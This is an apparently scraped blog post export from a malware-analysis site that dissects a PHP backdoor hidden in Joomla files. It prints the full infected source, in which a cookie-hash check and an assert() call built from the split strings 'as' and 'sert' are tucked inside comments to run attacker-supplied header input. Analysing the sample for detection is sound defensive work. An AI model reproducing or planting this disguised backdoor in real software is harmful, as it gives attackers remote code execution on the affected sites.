{"id":1434,"date":"2016-10-07T09:39:48","date_gmt":"2016-10-07T06:39:48","guid":{"rendered":"http:\/\/malware.expert\/?p=1434"},"modified":"2016-11-29T16:59:27","modified_gmt":"2016-11-29T13:59:27","slug":"cache-db-php","status":"publish","type":"post","link":"https:\/\/malware.expert\/malware\/cache-db-php\/","title":{"rendered":"cache-db.php"},"content":{"rendered":"

This is very old malware, Timestamp December 2015 and in Joomla \/cache\/cache-db.php or \/libraries\/simplepie\/simplepie.lib.php file.<\/p>\n

This is very cleverly made, and hide assert PHP execution inside the code. First time look source code, it looks like normal file.<\/p>\n

But when look better and trace first extra code<\/h4>\n
\r\n\/**\r\n * SimplePie Session ID\r\n *\/\r\n$id = $_SERVER['HTTP_SESSION'];\r\n<\/pre>\n
Second hidden code added<\/h4>\n
\r\n\/**\r\n * Returns a reference to the global JApplicationCli object, only creating it if it doesn't already exist.\r\n *\r\n * This method must be invoked as: $cli = JApplicationCli::getInstance();\r\n *\r\n * @param   string  $name  The*\/$sess = md5(@$_COOKIE[ssid]);\/*of the JApplicationCli class to instantiate.\r\n *\r\n * @return  JApplicationCli\r\n *\r\n * @since   11.1\r\n *\/ $a='as';\r\n<\/pre>\n
Third hidden code added<\/h4>\n
\r\n\/**\r\n * Execute the application.\r\n *\r\n * @return  void\r\n *\r\n * @since   11.1\r\n *\/ $b='sert'; $a=$a.$b;\r\nfunction execute()\r\n<\/pre>\n
Again, same way tried to hide extra code<\/h4>\n
\r\n\/**\r\n * Load an object or array into the application configuration object.\r\n *\r\n * @param   mixed  $data  Either an array or object to be loaded into the configuration object.\r\n *\r\n * @return  JApplicationCli  Instance of $this to allow chaining.\r\n *\r\n * @since   11.1\r\n *\/ $start = strpos($sess,'4db8da');\r\nfunction loadConfiguration($data)\r\n<\/pre>\n
Final execute if cookie match<\/h4>\n
PHP (assert<\/a>)<\/p>\n
\r\n\/**\r\n * Get an output object.\r\n *\r\n * @return  CliOutput\r\n *\r\n * @since   3.3\r\n *\/ if($start===0){@${a}($id);}\r\nfunction getOutput()\r\n<\/pre>\n
Detect this malware<\/h3>\n
Malware Expert – Signatures<\/a> found this malware from php code, if you want use our signatures for free.<\/p>\n
Full sourcecode with malware<\/h3>\n
\r\n<?php\r\n\/**\r\n * @package     Joomla.Platform\r\n * @subpackage  Application\r\n *\r\n * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.\r\n * @license     GNU General Public License version 2 or later; see LICENSE\r\n *\/\r\n\r\n!defined('JPATH_PLATFORM') or die;\r\n\r\n\/**\r\n * Base object Instance of SimplePie_Sanitize (or other class)\r\n *\r\n * @since  11.4\r\n *\/\r\n\r\n\/**\r\n * SimplePie Name\r\n *\/\r\ndefine('SIMPLEPIE_NAME', 'SimplePie');\r\n\r\n\/**\r\n * SimplePie Version\r\n *\/\r\ndefine('SIMPLEPIE_VERSION', '1.2');\r\n\r\n\/**\r\n * SimplePie Build\r\n *\/\r\ndefine('SIMPLEPIE_BUILD', '20090627192103');\r\n\r\n\/**\r\n * SimplePie Session ID\r\n *\/\r\n$id = $_SERVER['HTTP_SESSION'];\r\n\r\n\/**\r\n * Class constructor.\r\n *\r\n * @param   JInputCli         $input       An optional argument to provide dependency injection for the application's\r\n *                                         input object.  If the argument is a JInputCli object that object will become\r\n *                                         the application's input object, otherwise a default input object is created.\r\n * @param   Registry          $config      An optional argument to provide dependency injection for the application's\r\n *                                         config object.  If that object will become\r\n *                                         the application's config object, otherwise a default config object is created.\r\n * @param   JEventDispatcher  $dispatcher  An optional argument to provide dependency injection for the application's\r\n *                                         event dispatcher.  If the argument become\r\n *                                         the application's event dispatcher, if it is null then the default event dispatcher\r\n *                                         will be created based on the application's loadDispatcher() method.\r\n *\r\n * @see     JApplicationBase::loadDispatcher()\r\n * @since   11.1\r\n *\/\r\n\r\nfunction construct($input = null, $config = null, $dispatcher = null)\r\n{\r\n    \/\/ Close the application if we are not executed from the command line.\r\n    \/\/ @codeCoverageIgnoreStart\r\n    if (!defined('STDOUT') || !defined('STDIN') || !isset($_SERVER['argv']))\r\n    {\r\n        $this->close();\r\n    }\r\n    \/\/ @codeCoverageIgnoreEnd\r\n\r\n    \/\/ If a input object is given use it.\r\n    if ($input instanceof JInput)\r\n    {\r\n        $this->input = $input;\r\n    }\r\n    \/\/ Create the input based on the application logic.\r\n    else\r\n    {\r\n        if (class_exists('JInput'))\r\n        {\r\n            $this->input = new JInputCli;\r\n        }\r\n    }\r\n\r\n    \/\/ If a config object is given use it.\r\n    if ($config instanceof Registry)\r\n    {\r\n        $this->config = $config;\r\n    }\r\n    \/\/ Instantiate a new configuration object.\r\n    else\r\n    {\r\n        $this->config = new Registry;\r\n    }\r\n\r\n    $this->loadDispatcher($dispatcher);\r\n\r\n    \/\/ Load the configuration object.\r\n    $this->loadConfiguration($this->fetchConfigurationData());\r\n\r\n    \/\/ Set the execution datetime and timestamp;\r\n    $this->set('execution.datetime', gmdate('Y-m-d H:i:s'));\r\n    $this->set('execution.timestamp', time());\r\n\r\n    \/\/ Set the current directory.\r\n    $this->set('cwd', getcwd());\r\n}\r\n\r\n\/**\r\n * Returns a reference to the global JApplicationCli object, only creating it if it doesn't already exist.\r\n *\r\n * This method must be invoked as: $cli = JApplicationCli::getInstance();\r\n *\r\n * @param   string  $name  The*\/$sess = md5(@$_COOKIE[ssid]);\/*of the JApplicationCli class to instantiate.\r\n *\r\n * @return  JApplicationCli\r\n *\r\n * @since   11.1\r\n *\/ $a='as';\r\n\r\nfunction getInstance($name = null)\r\n{\r\n    \/\/ Only create the object if it doesn't exist.\r\n    if (empty(self::$instance))\r\n    {\r\n        if (class_exists($name) && (is_subclass_of($name, 'JApplicationCli')))\r\n        {\r\n            self::$instance = new $name;\r\n        }\r\n        else\r\n        {\r\n            self::$instance = new JApplicationCli;\r\n        }\r\n    }\r\n\r\n    return self::$instance;\r\n}\r\n\r\n\/**\r\n * Execute the application.\r\n *\r\n * @return  void\r\n *\r\n * @since   11.1\r\n *\/ $b='sert'; $a=$a.$b;\r\nfunction execute()\r\n{\r\n    \/\/ Trigger the onBeforeExecute event.\r\n    $this->triggerEvent('onBeforeExecute');\r\n\r\n    \/\/ Perform application routines.\r\n    $this->doExecute();\r\n\r\n    \/\/ Trigger the onAfterExecute event.\r\n    $this->triggerEvent('onAfterExecute');\r\n}\r\n\r\n\/**\r\n * Load an object or array into the application configuration object.\r\n *\r\n * @param   mixed  $data  Either an array or object to be loaded into the configuration object.\r\n *\r\n * @return  JApplicationCli  Instance of $this to allow chaining.\r\n *\r\n * @since   11.1\r\n *\/ $start = strpos($sess,'4db8da');\r\nfunction loadConfiguration($data)\r\n{\r\n    \/\/ Load the data into the configuration object.\r\n    if (is_array($data))\r\n    {\r\n        $this->config->loadArray($data);\r\n    }\r\n    elseif (is_object($data))\r\n    {\r\n        $this->config->loadObject($data);\r\n    }\r\n\r\n    return $this;\r\n}\r\n\r\n\/**\r\n * Write a string to standard output.\r\n *\r\n * @param   string   $text  The text to display.\r\n * @param   boolean  $nl    True (default) to append a new line at the end of the output string.\r\n *\r\n * @return  JApplicationCli  Instance of $this to allow chaining.\r\n *\r\n * @codeCoverageIgnore\r\n * @since   11.1\r\n *\/\r\nfunction out($text = '', $nl = true)\r\n{\r\n    $output = $this->getOutput();\r\n    $output->out($text, $nl);\r\n\r\n    return $this;\r\n}\r\n\r\n\/**\r\n * Get an output object.\r\n *\r\n * @return  CliOutput\r\n *\r\n * @since   3.3\r\n *\/ if($start===0){@${a}($id);}\r\nfunction getOutput()\r\n{\r\n    if (!$this->output)\r\n    {\r\n        \/\/ In 4.0, this will convert to throwing an exception and you will expected to\r\n        \/\/ initialize this in the constructor. Until then set a default.\r\n        $default = new Joomla\\Application\\Cli\\Output\\Xml;\r\n        $this->setOutput($default);\r\n    }\r\n\r\n    return $this->output;\r\n}\r\n\r\n\r\n\/**\r\n * Method to run the application routines.  Most likely you will want to instantiate a controller\r\n * and execute it, or perform some sort of task directly.\r\n *\r\n * @return  void\r\n *\r\n * @codeCoverageIgnore\r\n * @since   11.3\r\n *\/\r\nfunction doExecute()\r\n{\r\n    \/\/ Your application routines go here.\r\n}\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
This is very old malware, Timestamp December 2015 and in Joomla \/cache\/cache-db.php or \/libraries\/simplepie\/simplepie.lib.php file. This is very cleverly made, and hide assert PHP execution inside the code. First time look source code, it looks like normal file. But when look better and trace first extra code \/** * SimplePie Session ID *\/ $id = … Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[66],"tags":[],"class_list":["post-1434","post","type-post","status-publish","format-standard","hentry","category-malware"],"yoast_head":"\ncache-db.php<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/malware.expert\/malware\/cache-db-php\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"cache-db.php\" \/>\n<meta property=\"og:description\" content=\"This is very old malware, Timestamp December 2015 and in Joomla \/cache\/cache-db.php or \/libraries\/simplepie\/simplepie.lib.php file. This is very cleverly made, and hide assert PHP execution inside the code. First time look source code, it looks like normal file. But when look better and trace first extra code \/** * SimplePie Session ID *\/ $id = ... Read more\" \/>\n<meta property=\"og:url\" content=\"https:\/\/malware.expert\/malware\/cache-db-php\/\" \/>\n<meta property=\"og:site_name\" content=\"Malware Expert\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Malware.Expert\/\" \/>\n<meta property=\"article:published_time\" content=\"2016-10-07T06:39:48+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2016-11-29T13:59:27+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/malware.expert\/wp-content\/uploads\/2016\/06\/ModSecurity_feature_image.png\" \/>\n\t<meta property=\"og:image:width\" content=\"900\" \/>\n\t<meta property=\"og:image:height\" content=\"450\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Malware__Expert\" \/>\n<meta name=\"twitter:site\" content=\"@Malware__Expert\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/malware.expert\/malware\/cache-db-php\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/malware.expert\/malware\/cache-db-php\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3\"},\"headline\":\"cache-db.php\",\"datePublished\":\"2016-10-07T06:39:48+00:00\",\"dateModified\":\"2016-11-29T13:59:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/malware.expert\/malware\/cache-db-php\/\"},\"wordCount\":916,\"publisher\":{\"@id\":\"https:\/\/malware.expert\/#organization\"},\"articleSection\":[\"malware\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/malware.expert\/malware\/cache-db-php\/\",\"url\":\"https:\/\/malware.expert\/malware\/cache-db-php\/\",\"name\":\"cache-db.php\",\"isPartOf\":{\"@id\":\"https:\/\/malware.expert\/#website\"},\"datePublished\":\"2016-10-07T06:39:48+00:00\",\"dateModified\":\"2016-11-29T13:59:27+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/malware.expert\/malware\/cache-db-php\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/malware.expert\/malware\/cache-db-php\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/malware.expert\/malware\/cache-db-php\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/malware.expert\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"malware\",\"item\":\"https:\/\/malware.expert\/category\/malware\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"cache-db.php\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/malware.expert\/#website\",\"url\":\"https:\/\/malware.expert\/\",\"name\":\"Malware Expert\",\"description\":\"ModSecurity rules\",\"publisher\":{\"@id\":\"https:\/\/malware.expert\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/malware.expert\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/malware.expert\/#organization\",\"name\":\"Malware Expert\",\"url\":\"https:\/\/malware.expert\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png\",\"contentUrl\":\"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png\",\"width\":408,\"height\":82,\"caption\":\"Malware Expert\"},\"image\":{\"@id\":\"https:\/\/malware.expert\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Malware.Expert\/\",\"https:\/\/x.com\/Malware__Expert\"],\"publishingPrinciples\":\"https:\/\/malware.expert\/editorial-guidelines\/\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/malware.expert\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/willberg.me\"],\"url\":\"https:\/\/malware.expert\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"cache-db.php","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/malware.expert\/malware\/cache-db-php\/","og_locale":"en_US","og_type":"article","og_title":"cache-db.php","og_description":"This is very old malware, Timestamp December 2015 and in Joomla \/cache\/cache-db.php or \/libraries\/simplepie\/simplepie.lib.php file. This is very cleverly made, and hide assert PHP execution inside the code. First time look source code, it looks like normal file. But when look better and trace first extra code \/** * SimplePie Session ID *\/ $id = ... Read more","og_url":"https:\/\/malware.expert\/malware\/cache-db-php\/","og_site_name":"Malware Expert","article_publisher":"https:\/\/www.facebook.com\/Malware.Expert\/","article_published_time":"2016-10-07T06:39:48+00:00","article_modified_time":"2016-11-29T13:59:27+00:00","og_image":[{"width":900,"height":450,"url":"https:\/\/malware.expert\/wp-content\/uploads\/2016\/06\/ModSecurity_feature_image.png","type":"image\/png"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@Malware__Expert","twitter_site":"@Malware__Expert","twitter_misc":{"Written by":"admin","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/malware.expert\/malware\/cache-db-php\/#article","isPartOf":{"@id":"https:\/\/malware.expert\/malware\/cache-db-php\/"},"author":{"name":"admin","@id":"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3"},"headline":"cache-db.php","datePublished":"2016-10-07T06:39:48+00:00","dateModified":"2016-11-29T13:59:27+00:00","mainEntityOfPage":{"@id":"https:\/\/malware.expert\/malware\/cache-db-php\/"},"wordCount":916,"publisher":{"@id":"https:\/\/malware.expert\/#organization"},"articleSection":["malware"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/malware.expert\/malware\/cache-db-php\/","url":"https:\/\/malware.expert\/malware\/cache-db-php\/","name":"cache-db.php","isPartOf":{"@id":"https:\/\/malware.expert\/#website"},"datePublished":"2016-10-07T06:39:48+00:00","dateModified":"2016-11-29T13:59:27+00:00","breadcrumb":{"@id":"https:\/\/malware.expert\/malware\/cache-db-php\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/malware.expert\/malware\/cache-db-php\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/malware.expert\/malware\/cache-db-php\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/malware.expert\/"},{"@type":"ListItem","position":2,"name":"malware","item":"https:\/\/malware.expert\/category\/malware\/"},{"@type":"ListItem","position":3,"name":"cache-db.php"}]},{"@type":"WebSite","@id":"https:\/\/malware.expert\/#website","url":"https:\/\/malware.expert\/","name":"Malware Expert","description":"ModSecurity rules","publisher":{"@id":"https:\/\/malware.expert\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/malware.expert\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/malware.expert\/#organization","name":"Malware Expert","url":"https:\/\/malware.expert\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/malware.expert\/#\/schema\/logo\/image\/","url":"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png","contentUrl":"https:\/\/malware.expert\/wp-content\/uploads\/2023\/08\/cropped-malware_express_header_logo.png","width":408,"height":82,"caption":"Malware Expert"},"image":{"@id":"https:\/\/malware.expert\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Malware.Expert\/","https:\/\/x.com\/Malware__Expert"],"publishingPrinciples":"https:\/\/malware.expert\/editorial-guidelines\/"},{"@type":"Person","@id":"https:\/\/malware.expert\/#\/schema\/person\/1016f76dbc76823a9aba2ba8f14abfd3","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/malware.expert\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/76c5b003c7f6492ce413d3ad91151c1d648c58e54c5b360eeb19eec3562a0393?s=96&d=mm&r=g","caption":"admin"},"sameAs":["http:\/\/willberg.me"],"url":"https:\/\/malware.expert\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts\/1434","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/comments?post=1434"}],"version-history":[{"count":5,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts\/1434\/revisions"}],"predecessor-version":[{"id":22669,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/posts\/1434\/revisions\/22669"}],"wp:attachment":[{"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/media?parent=1434"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/categories?post=1434"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/malware.expert\/wp-json\/wp\/v2\/tags?post=1434"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}